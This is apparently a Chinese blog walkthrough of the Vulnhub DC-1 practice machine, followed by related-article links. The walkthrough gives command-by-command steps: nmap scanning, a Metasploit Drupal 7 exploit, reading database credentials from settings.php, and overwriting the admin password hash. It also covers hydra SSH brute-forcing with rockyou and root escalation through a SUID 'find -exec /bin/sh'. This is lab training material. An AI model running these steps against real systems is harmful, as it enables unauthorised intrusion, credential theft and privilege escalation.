Vulnhub靶场-DC-1靶机练习

最新推荐文章于 2022-10-03 14:10:28 发布
最新推荐文章于 2022-10-03 14:10:28 发布
阅读量368 收藏
点赞数 1
分类专栏: DC靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44877412/article/details/112911030
版权

Vulnhub-DC-1

daoyuan
## 零、环境配置

​ 1、虚拟机:vmware 15.5.6

​ 2、攻击环境:kali linux 2020.3 192.168.143.128

​ 3、靶机:DC-1

​ 靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。
在这里插入图片描述

一、攻击过程

一、主机存活扫描

arp-scan -l
探测到目标ip:192.168.143.134

在这里插入图片描述

二、端口扫描

namp -A -p- 192.168.143.134
扫描到以下端口以及服务
22端口——ssh服务
80端口——http服务

三、漏洞探测

在这里插入图片描述

nmap --script=vuln 192.168.143.134
探测到Drupal 7 版本存在漏洞

在这里插入图片描述

四、漏洞攻击

msfconsole
打开msfconsole

在这里插入图片描述

search drupal 7
搜索drupal 7 漏洞,显示有最新的2018版,而且效果很棒。

在这里插入图片描述

use 4(定位到攻击载荷4)
set rhosts 192.168.143.134(设定靶机IP)
exploit(开始攻击)

在这里插入图片描述

shell             
#(得到shell)
python -c "import pty;pty.spawn('/bin/bash')"
#(Python 交互shell脚本,数据库只允许本地连接,我们需要一个shell)
ls -al
(查看所有文件可以看到有flag1)

在这里插入图片描述

cat flag1.txt
打开flag1.txt 得到提示CMS配置文件的提示,百度drupal配置文件信息

在这里插入图片描述
在这里插入图片描述

cat sites/default/settings.php
打开配置文件得到flag2
提示爆破与字典不是唯一的方法,同时给出了数据库的相关信息。

在这里插入图片描述
在这里插入图片描述

mysql -u dbuser -p #(登入数据库。输入密码)
show databases;#(显示所有数据库名)
use drupaldb#(定位drupaldb数据库)
show tables;#(显示当前数据库的所有表)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

探测到有用的表——>users
select * from users;
查看users表内容,发现用户名admin,但密码是一段hash值,难以破解。这里直接替换掉它

在这里插入图片描述

cd ..
./scripts/password-hash.sh daoyuan
用script脚本生成daoyuan的hash密码

在这里插入图片描述

update users set pass="$S$DxFoVcv5JJYjcK/pu4PLBq74qKW/ZCQKFMYcsSPadKFI9ms9K.gR" where uid=1;
用新密码生成的hash值覆盖原有密码

在这里插入图片描述
登入网页发现flag3,提示passwd,联想passwd文件
在这里插入图片描述
在这里插入图片描述

cat etc/passwd
打开passwd文件发现有账户flag4,之前端口扫描发现22端口已经开启
这里用ssh远程登入,但不知道密码

在这里插入图片描述

尝试用hydra爆破一下
字典用自带的rockyou.txt
进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:

gzip -d rockyou.txt.gz
复制txt到root目录下

hydra -l flag4 -P rockyou.txt 192.168.143.134 ssh
得到密码orange,可以ssh远程登入了

在这里插入图片描述

ssh flag4@192.168.143.134 -p 22
密码orange

在这里插入图片描述

得到flag4 ,提示root,我们这里是www用户,权限很低,root就是暗示提权
在这里插入图片描述

find / -type f -perm -u=s 2>/dev/null
查找靶机可执行的二进制文件,找到了find的suid权限.

在这里插入图片描述

	touch 1
	find 1 -exec "/bin/sh" \;
	cd /root
	cat thefinalflag.txt
	find提权,得到最后的flag

在这里插入图片描述

至此,5个flag已经全部找出!

如有错误,烦请不吝赐教。
转载请注明出处!

.风溪.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vlunhub靶机一Kioptrix
willow_liang的博客
01-29 1167
Kioptrix Level 1 (#1) 1.查找靶机ip地址 1.使用nbtscan查找
DC-1靶场练习
negnegil的博客
06-05 148
靶机 DC-1 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 将靶机拖入虚拟机运行,打开即可 上来先用kali中的工具扫描以下局域网中的ip #ip addr #arp-scan -l or #netdiscover -r 192.168.1.0/24 -i eth0 知道靶机ip后,nmap扫一下端口 nmap -A -p- 192.168.1.101 看到22、80、111端口和其详细信息,了解到该网站由drupal7搭建 先访问80端口看看 没有发现
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3394
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
vulnhub web1靶机练习
Aiwin的博客
10-03 754
vulnhub web1靶机和分析
Vulnhub靶机 DC-3
菜浪马废的博客
03-20 391
扫描ip 找到靶机192.168.0.131 发现开放80端口 必须访问一下啊 这个样子的,没啥信息 上插件 wappalyzer 火狐的指纹信息插件 nmap也扫了一下 实锤了,Joomla的cms 那肯定要用配套的joomscan扫一下啊 没事就扫一扫,扫扫更健康 没安装,先装一下 apt-get install joomscan 安装命令 看见版本号了,3.7.0,还有后台...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
vulnhub DC8 靶场练习
鸥鹭忘机
09-03 1088
前言 这次练习靶机vulnhub平台下的DC系列靶机第8台,下载地址为https://www.vulnhub.com/entry/dc-8,367/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的总体难度不大,利用的漏洞也是常见的,只要细心观察就可以发现这个突破口。 虚拟机配置 这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-6靶机,然后选中配置。依次点击网络配置->NAT模式->高级->生成,然后确认即可。
vulnhub渗透测试CD-1
m0_50800033的博客
11-15 271
一、 探测目标机器的IP 1、找到同一网段的存活主机 二、 信息收集 1、利用Nmap进行全端口扫描。 -sV:用于扫描目标主机服务版本号和端口运行的软件的版本 -p-:扫描所有端口 从图中知:靶机开放端口有22,80,111,55516。 2、网站指纹识别 ①网站指纹识别 whatweb ②使用Wappalyzer插件进行网站指纹识别 从而知道该网站CMS是drupal。 三、 漏洞利用 1、谷歌Drupal的漏洞利用 2、metasploit对漏洞进行利用 四、 提权(Privilege E
vuluhub
avasy的博客
02-11 1186
Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in fren...
靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1149
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
Vulnhub系列之DC1靶场详解
weixin_50053818的博客
05-04 3247
文章目录环境drupal 7.x漏洞拿flag1在目录中找配置文件拿flag2改密码进网站拿flag2ssh爆破拿flag4提权拿最后的flag 环境 DC-1靶场 VMware虚拟机 kali drupal 7.x漏洞拿flag1 首先搭建好靶场。这次一次黑盒靶场测试,只能从虚拟机中查看DC1靶场的mac地址,从而查出目标靶机的IP。 所以目标IP地址为192.168.31.184,直接上nmap进行目标全面扫描。 由nmap扫描可以知道,目标靶机开放了22,80,111,42875端口,看到端
Vulnhub靶场DC-1
0nc3的博客
06-18 1087
0x00 前言 这是一篇莫得灵魂的关键处复现解题记录,大佬们都tql 下载链接:https://download.vulnhub.com/dc/DC-1.zip 靶场难度:初级(适合我这种小萌新) 0x01 信息收集 扫描一下DC-1靶机分配到的IP 再使用SYN连接扫描一下 可以看到80端口是打开的,访问一下 到处翻了翻也没发现啥,查看robots.txt好像也没啥用 在网站下方提示为dr...
DC-1靶场(CVE-2018-7600)
lionwerson的博客
10-14 1798
1.下载DC-1靶场: DC-1下载地址https://download.vulnhub.com/dc/DC-1.zip2.解压打开靶场,导入虚拟机网络模式改为桥接模式,打开虚拟机。 3.浏览器访问80端口,其实也可以先用nmap扫描一下端口。 是一个Drupal CMS。 4.先挂扫描器走一波。 发现存在CVE-2018-7600的Drupal的一个RCE,并且小于7的版本都可以,这个应该就是这个靶场的主要漏洞了。 poc如下: 漏洞存在,验证 poc: #!/usr/b..
vulnhub DC-1 靶机
FourthGuy的博客
05-03 580
打开我们的kali linux 和 DC-1 靶机 信息收集 扫描靶机ip: arp-scan -l 查看网段的所有主机 由上图得到DC-1靶机ip为192.168.88.129 nmap端口扫描:接下来就要用我们的神器nmap了 (端口:如果我们把ip看成是一个房子,端口就是门,我们需要通过端口来从ip这里获取,传输数据) ...
Vulnhub靶场】RED: 1
DG_s1mple
03-18 1748
环境准备 下载靶机导入到vmware 但是获取不到地址,可以根据我博客里的方法修改网卡来获取IP地址 信息收集 我们改好网卡之后,我们使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.15 攻击机IP地址为:192.168.2.17 我们使用nmap扫描靶机开放的端口信息 只开放了ssh跟80端口,我们首先访问他的网站 发现是一个被黑了的网站,点击search后,会跳到一个域名 我们修改hosts解析 渗透开始 修改好后,网站可以正常访问了,我们看看有没有什
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值